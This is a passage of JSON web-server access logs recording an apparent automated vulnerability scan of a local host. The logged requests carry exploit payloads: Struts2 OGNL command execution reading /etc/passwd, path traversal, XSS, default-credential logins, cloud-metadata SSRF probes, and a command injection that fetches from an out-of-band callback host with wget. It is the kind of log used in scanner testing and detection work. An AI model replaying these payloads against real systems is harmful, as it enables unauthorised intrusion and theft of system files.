"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/96 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22userReference\x22:{},\x22loginReference\x22:{\x22link\x22:\x22http://localhost/mgmt/shared/gossip\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/shared/authn/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMUser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/start.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http\x5C..\x5Cadmin\x5Clogin\x5Clogin_check.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://ca2tuc8smpv1g2s80ca0i9pz8bkcyjuxe.oast.pro","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boafrm/formSysCmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/getuser?index=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /maint/index.php?packages HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com;@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/97 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cu.html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2/axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"btnPost=Log+In&username={{username}}&password=0a7ef986b3b5ab8a809774cf3d09ec16&savedate=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zb_system/cmd.php?act=verify HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws/v1/cluster/apps/new-application HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https%3a%2f%2fexample.com%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RichWidgets/Popup_Upload.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /radiusmanager/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"username=admin&password=geoserver","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /geoserver/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/98 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration.php-dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.368","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/latest/meta-data/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.541","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis/happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pureweb/server/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 